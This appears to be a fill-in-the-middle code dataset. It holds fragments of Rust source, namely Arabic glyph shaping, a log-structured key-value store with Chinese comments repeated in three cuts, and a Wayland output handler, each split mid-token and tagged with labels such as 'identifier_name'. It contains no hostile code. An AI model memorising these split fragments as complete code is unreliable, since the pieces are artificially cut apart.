.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA | {
self.extra_data.feature_tag = feature_tag
} | identifier_body | |
kv.rs | let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> Result<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value)) | Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
}
let mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info | } else { | random_line_split |
kv.rs | let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> Result<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value))
} else {
Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start | mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info | (cmd_pos.pos))?;
}
let | conditional_block |
kv.rs | new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> | ult<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value))
} else {
Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
}
let mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001 | Res | identifier_name |
output.rs | for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
/// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically
/// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn | (info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else {
false
}
});
}
fn notify_status_listeners(
output: &Attached<W | merge_event | identifier_name |
output.rs | layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
